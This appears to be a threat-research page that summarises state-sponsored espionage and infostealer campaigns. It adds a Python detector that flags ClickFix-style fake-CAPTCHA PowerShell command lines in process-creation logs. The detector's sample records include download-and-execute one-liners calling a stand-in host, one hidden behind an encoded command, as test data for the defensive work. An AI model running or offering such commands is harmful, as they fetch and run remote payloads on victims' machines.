Threat Research

    APT28, a Russian state-sponsored threat group also known as Fancy Bear or UAC-0001, is conducting a sophisticated espionage campaign against European military and government entities. The operation primarily targets maritime and transportation organizations in Poland, Slovenia, Turkey, Greece, the UAE, and Ukraine....
    The Muddy Water APT has launched a spearphishing campaign targeting diplomatic, maritime, financial, and telecom sectors across the Middle East, delivering malicious Word documents with icon spoofing....
    BlindEagle launched a spear-phishing campaign targeting a Colombian government agency under the Ministry of Commerce, Industry and Tourism (MCIT), using emails sent from a compromised internal account to bypass security controls....
    UNC1549 often gained initial access by blending targeted social engineering with the use of compromised third-party accounts. Using credentials stolen from vendors or partners, the group took advantage of legitimate trust relationships to enter victim environments....
    Silent Lynx is an espionage-driven APT group known for spear-phishing campaigns impersonating government officials to target Central Asian, Russian, and Southeast Asian entities. Recent analysis shows the group’s slow tactical evolution, using fake RAR archives and malicious .NET implants, while making operational errors that exposed new infrastructure....
    Between July and August 2025, TA415 conducted spearphishing campaigns targeting U.S. government, think tanks, and academic institutions using U.S.-China economic-themed lures. The group impersonated prominent entities like the Select Committee on Strategic Competition and the US-China Business Council to target individuals focused on U.S.-China relations....
    The Gonepostal malware has been observed in an espionage campaign linked to KTA007 (aka Fancy Bear/APT28), a Russian state-sponsored group tied to GRU Unit 26165. The malware consists of a dropper DLL and a password-protected Outlook macro file (VbaProject.OTM) that enables backdoor access via email-based C2....
    A research center uncovered a DPRK-linked espionage campaign targeting diplomatic missions in South Korea in early 2025. Between March and July, at least 19 spear-phishing attacks impersonated trusted contacts to lure embassy staff. Attackers used GitHub for covert C2 communications and cloud platforms like Dropbox to deliver XenoRAT malware....
    On May 15th, email security tools detected a sophisticated spear-phishing campaign targeting CFOs and finance executives at banks, energy firms, insurance companies, and investment groups across Europe, Africa, Canada, the Middle East, and South Asia. This multi-stage attack aimed to deliver NetBird, a legitimate WireGuard-based remote access tool, onto victims’ systems....
    LummaC2 is an infostealer that was observed targeting critical U.S. infrastructure sectors between November 2023 and May 2025. It spreads via spearphishing and fake CAPTCHA pages that trick users into pasting and running PowerShell commands, and is often embedded in spoofed software; the malware first emerged on Russian-speaking forums in 2022....
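    The fake-CAPTCHA lure described above ends with the victim pasting a command into the Run dialog, so the interpreter is spawned directly under explorer.exe with a download-and-execute one-liner. The Python below is an added example, not code from the page or from any vendor or advisory it summarizes: it scores constructed Sysmon-style process-creation records (the field names, cue weights and threshold are assumptions) and flags the lure path, including the case where the payload is hidden behind -EncodedCommand.

```python
"""Score process-creation records for ClickFix-style fake-CAPTCHA command lines.

Added example; not code from the page or from any vendor named on it. The
records are constructed by hand to resemble Sysmon Event ID 1 fields; the
cue weights and threshold are assumptions chosen for illustration.
"""
import base64
import re

# Interpreters a Run-dialog "verification" prompt typically hands the text to.
LOLBIN_IMAGES = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe")

# (regex, weight, label): cues commonly seen in the pasted command.
CUES = [
    (r"\b(iex|invoke-expression)\b", 3, "inline execution (iex)"),
    (r"\b(iwr|invoke-webrequest|invoke-restmethod|irm)\b", 2, "web download cmdlet"),
    (r"\.(downloadstring|downloadfile)\s*\(", 2, "WebClient download"),
    (r"\bmshta(\.exe)?\s+https?://", 3, "mshta remote HTA"),
    (r"\s-(w|windowstyle)\s+hidden\b", 1, "hidden window"),
    (r"\s-(nop|noprofile)\b", 1, "no profile"),
    (r"#\s*(i am not a robot|verify you are human|verification id)", 4, "fake-CAPTCHA comment"),
]

ENC_RE = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([a-z0-9+/=]{20,})", re.I)


def expand_encoded(cmdline):
    """Replace a -EncodedCommand blob with its UTF-16LE plaintext so the cues
    see what actually runs. Returns (text, was_encoded)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, False
    try:
        plain = base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # bad padding / not base64: keep the cue, drop the blob
        plain = ""
    return cmdline[:m.start()] + " " + plain + " " + cmdline[m.end():], True


def score_event(event):
    """Score one record. Returns (score, [labels])."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in LOLBIN_IMAGES:
        return 0, []
    text, encoded = expand_encoded(event["CommandLine"])
    score, labels = 0, []
    for pattern, weight, label in CUES:
        if re.search(pattern, text, re.I):
            score += weight
            labels.append(label)
    if encoded:
        score += 2
        labels.append("encoded command")
    # The Run dialog launches the interpreter directly under explorer.exe;
    # an admin script normally arrives via cmd.exe, a scheduler or an agent.
    if parent == "explorer.exe":
        score += 2
        labels.append("launched from explorer.exe (Run dialog)")
    return score, labels


def detect(events, threshold=5):
    """Return [(record id, score, labels)] for records at or above threshold."""
    hits = []
    for ev in events:
        s, labels = score_event(ev)
        if s >= threshold:
            hits.append((ev["Id"], s, labels))
    return hits


# Constructed sample records (assumed field names; example.invalid is reserved).
_PAYLOAD = "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a.txt')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"Id": "ev-1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"Id": "ev-2", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"Id": "ev-3", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"iex (iwr 'http://example.invalid/verify.txt' "
                    "-UseBasicParsing).Content\" # I am not a robot - reCAPTCHA Verification ID: 7391"},
    {"Id": "ev-4", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + _ENCODED},
    {"Id": "ev-5", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig /all"},
]

if __name__ == "__main__":
    for rec_id, score, labels in detect(SAMPLE_EVENTS):
        print(f"{rec_id}: score={score} {labels}")
```

    Only ev-3 and ev-4 cross the threshold: the backup script launched from cmd.exe scores 1 and the ipconfig run from the Run dialog scores 2, so the explorer.exe parent alone is never enough. Decoding the -EncodedCommand blob before matching is what lets the encoded variant surface the same iex/DownloadString cues as the plaintext one.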